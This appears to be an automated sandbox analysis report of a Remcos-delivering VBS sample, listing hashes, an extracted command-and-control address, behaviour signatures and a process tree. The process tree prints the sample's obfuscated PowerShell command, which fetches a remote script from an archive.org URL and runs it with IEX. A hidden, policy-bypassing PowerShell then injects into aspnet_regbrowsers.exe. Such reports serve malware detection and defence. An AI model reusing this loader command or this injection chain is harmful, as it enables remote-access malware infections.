Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
20-04-2021 06:00
Static task
static1
Behavioral task
behavioral1
Sample
Appraisal11002275444900.vbs
Resource
win7v20210408
General
-
Target
Appraisal11002275444900.vbs
-
Size
662B
-
MD5
8da164753530662b1f603f7b23413223
-
SHA1
18a3665edcb3b3d3c53f9755bc225569a64ae642
-
SHA256
b61f6b794f38f736e90ae8aa04e5f71acc8d5470c08ef8841c16087b6710a388
-
SHA512
b3c8b9e85c2ab36abf02b479e68287890d94f8c125151ed88f8f26a509444de8207835b51131eee1095f7f3bf37e284e6853ff3b9aa63e91781f2e93b68e95c0
Malware Config
Extracted
remcos
194.5.97.183:8888
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 8 612 powershell.exe 21 612 powershell.exe 23 612 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 4076 set thread context of 1808 4076 powershell.exe aspnet_regbrowsers.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 33 IoCs
Processes:
powershell.exepowershell.exepid process 612 powershell.exe 612 powershell.exe 612 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 612 powershell.exe Token: SeDebugPrivilege 4076 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
aspnet_regbrowsers.exepid process 1808 aspnet_regbrowsers.exe -
Suspicious use of WriteProcessMemory 31 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 2204 wrote to memory of 612 2204 WScript.exe powershell.exe PID 2204 wrote to memory of 612 2204 WScript.exe powershell.exe PID 612 wrote to memory of 4076 612 powershell.exe powershell.exe PID 612 wrote to memory of 4076 612 powershell.exe powershell.exe PID 4076 wrote to memory of 2280 4076 powershell.exe aspnet_regbrowsers.exe PID 4076 wrote to memory of 2280 4076 powershell.exe aspnet_regbrowsers.exe PID 4076 wrote to memory of 2280 4076 powershell.exe aspnet_regbrowsers.exe PID 4076 wrote to memory of 2236 4076 powershell.exe aspnet_regbrowsers.exe PID 4076 wrote to memory of 2236 4076 powershell.exe aspnet_regbrowsers.exe PID 4076 wrote to memory of 2236 4076 powershell.exe aspnet_regbrowsers.exe PID 4076 wrote to memory of 2200 4076 powershell.exe aspnet_regbrowsers.exe PID 4076 wrote to memory of 2200 4076 powershell.exe aspnet_regbrowsers.exe PID 4076 wrote to memory of 2200 4076 powershell.exe aspnet_regbrowsers.exe PID 4076 wrote to memory of 3916 4076 powershell.exe aspnet_regbrowsers.exe PID 4076 wrote to memory of 3916 4076 powershell.exe aspnet_regbrowsers.exe PID 4076 wrote to memory of 3916 4076 powershell.exe aspnet_regbrowsers.exe PID 4076 wrote to memory of 200 4076 powershell.exe aspnet_regbrowsers.exe PID 4076 wrote to memory of 200 4076 powershell.exe aspnet_regbrowsers.exe PID 4076 wrote to memory of 200 4076 powershell.exe aspnet_regbrowsers.exe PID 4076 wrote to memory of 1808 4076 powershell.exe aspnet_regbrowsers.exe PID 4076 wrote to memory of 1808 4076 powershell.exe aspnet_regbrowsers.exe PID 4076 wrote to memory of 1808 4076 powershell.exe aspnet_regbrowsers.exe PID 4076 wrote to memory of 1808 4076 powershell.exe aspnet_regbrowsers.exe PID 4076 wrote to memory of 1808 4076 powershell.exe aspnet_regbrowsers.exe PID 4076 wrote to memory of 1808 4076 powershell.exe aspnet_regbrowsers.exe PID 4076 wrote to memory of 1808 4076 powershell.exe aspnet_regbrowsers.exe PID 4076 wrote to memory of 1808 4076 powershell.exe aspnet_regbrowsers.exe PID 4076 wrote to memory of 1808 4076 powershell.exe aspnet_regbrowsers.exe PID 4076 wrote to memory of 1808 4076 powershell.exe aspnet_regbrowsers.exe PID 4076 wrote to memory of 1808 4076 powershell.exe aspnet_regbrowsers.exe PID 4076 wrote to memory of 1808 4076 powershell.exe aspnet_regbrowsers.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Appraisal11002275444900.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2204 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601405.us.archive.org/15/items/all_20210407_20210407_0728/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:612 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file "C:\Users\Public\ Microsoft.ps1"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"4⤵PID:2280
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"4⤵PID:2236
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"4⤵PID:2200
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"4⤵PID:3916
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"4⤵PID:200
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"4⤵
- Suspicious use of SetWindowsHookEx
PID:1808
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
b5795726bb04f5f9584184ae1f50777b
SHA191b250e76c41066a009b70200c5254a40980228b
SHA2565d9ba7ab51a7d06ad420cb23f7c1e02b911fe2e25d7af1eebe25d1690231d784
SHA51210ba2e523af4ccdf3e1e0867aa4d50a58919f5d39073bac17a8ab491f5ce09bcbda0730b9485a503adccfa323642b19e29879a0ad88f609d683080b668ef95fb